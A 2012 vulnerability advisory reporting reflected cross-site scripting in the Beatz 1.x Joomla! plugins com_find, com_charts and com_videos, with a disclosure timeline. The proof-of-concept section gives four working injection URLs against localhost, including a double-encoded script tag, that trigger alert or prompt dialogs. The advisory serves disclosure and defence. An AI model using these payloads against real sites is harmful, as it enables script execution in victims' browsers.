- OVERVIEW
Beatz 1.x versions are vulnerable to Cross Site Scripting.
- BACKGROUND
Beatz is a set of powerful Social Networking Script Joomla! 1.5
plugins that allows you to start your own favourite artist band
website. Although it is just a Joomla! plugin, it comes with full
Joolma! bundle for ease of use and installation.
- VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized upon submission, which
allows attacker to conduct Cross Site Scripting attack. This may allow
an attacker to create a specially crafted URL that would execute
arbitrary script code in a victim's browser. The vulnerable plugins
include: com_find, com_charts and com_videos.
- VERSIONS AFFECTED
Tested in 1.x versions
- PROOF-OF-CONCEPT/EXPLOIT
== Generic Joomla! 1.5 Double Encoding XSS
http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1
== com_charts (parameter: do)
http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts
== com_find (parameter: keyword)
http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find
== com_videos (parameter: video_keyword)
http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search
- SOLUTION
The vendor hasn't released the fixed yet.
- VENDOR
Cogzidel Technologies Pvt Ltd.
http://www.cogzidel.com/
- CREDIT
Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.
- DISCLOSURE TIME-LINE
2011-03-01: notified vendor
2012-04-15: vulnerability disclosed
- REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss
#yehg [2012-04-15]